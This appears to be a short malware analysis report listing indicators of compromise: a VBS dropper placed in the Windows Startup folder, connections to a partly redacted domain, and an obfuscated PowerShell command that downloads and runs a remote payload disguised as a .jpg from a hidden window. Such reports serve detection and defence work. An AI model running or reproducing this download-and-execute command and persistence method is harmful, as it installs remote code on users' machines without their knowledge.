Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\90ad.vbs
- %TEMP%\90ab.tmp\90ac.tmp\90ad.vbs
- '4u##.com':80
- '4u##.com':443
- http://www.4u##.com/uploads/file_2020-04-13_185006.jpg
- DNS ASK 4u##.com
- '<SYSTEM32>\wscript.exe' %TEMP%\90AB.tmp\90AC.tmp\90AD.vbs //Nologo
- '<SYSTEM32>\wscript.exe' %TEMP%\90AB.tmp\90AC.tmp\90AD.vbs //Nologo (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://www.4u##.com/uploads/file_2020-04-13_185006....' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('http://www.4u##.com/uploads/file_2020-04-13_185006....